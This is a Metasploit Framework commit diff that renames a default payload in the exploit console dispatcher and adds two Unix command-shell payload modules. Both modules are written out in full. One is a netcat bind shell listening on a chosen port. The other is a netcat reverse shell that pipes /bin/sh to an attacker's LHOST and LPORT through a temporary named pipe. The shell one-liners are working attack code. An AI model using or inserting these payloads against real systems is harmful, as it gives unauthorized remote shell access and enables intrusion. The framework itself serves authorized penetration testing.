modified CommandDispatcher::Exploit to have the change into account

jvazquez-r7 · jvazquez-r7 · commit f0cee29100ef · 2013-03-11T18:08:46.000+01:00
diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -253,7 +253,7 @@ def self.choose_payload(mod, target)
 			'cmd/unix/interact',
 			'cmd/unix/reverse',
 			'cmd/unix/reverse_perl',
-			'cmd/unix/reverse_netcat',
+			'cmd/unix/reverse_netcat_gaping',
 			'windows/meterpreter/reverse_nonx_tcp',
 			'windows/meterpreter/reverse_ord_tcp',
 			'windows/shell/reverse_tcp',
diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -0,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit4
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
+			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'netcat',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+	end
+
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -0,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit4
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
+			'Description'   => 'Creates an interactive shell via netcat',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'netcat',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+	end
+
+end
